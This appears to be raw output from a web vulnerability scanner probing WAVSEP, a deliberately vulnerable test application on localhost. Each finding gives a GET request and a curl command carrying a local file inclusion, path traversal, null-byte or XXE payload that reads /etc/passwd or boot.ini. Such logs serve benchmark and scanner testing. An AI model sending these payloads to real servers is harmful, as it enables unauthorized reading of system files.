GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fboot.ini%00pix.gix"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2F%2Fetc%2Fpasswd%22%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case12-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultInvalidInput-NoPathReq-Read.jsp?target=%3C%3Fxml%20version%3D%221.0%22%20encoding%3D%22ISO-8859-1%22%3F%3E%3C%21DOCTYPE%20foo%5B%3C%21ELEMENT%20foo%20ANY%3E%3C%21ENTITY%20xxe%20SYSTEM%20%22file%3A%2F%2Fc%3A%2Fboot.ini%3E%5D%3E%3Cfoo%3E%26xxe%3B%3C%2Ffoo%3E"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00 HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=file%3A%2F%2Fc%3A%5C%5Cboot.ini"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=c%3A%5C%5Cboot.ini%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.htm"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.html"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.php"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.asp"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.aspx"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00index.css"
Possible Java include/open vulnerability via injection in the parameter target
GET /wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif HTTP/1.1 Host: 127.0.0.1:8090
curl "http://127.0.0.1:8090/wavsep/active/LFI/LFI-Detection-Evaluation-GET-500Error/Case14-LFI-FileClass-FilenameContext-Unrestricted-FileDirective-DefaultEmptyInput-NoPathReq-Read.jsp?target=..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd%00pix.gif"
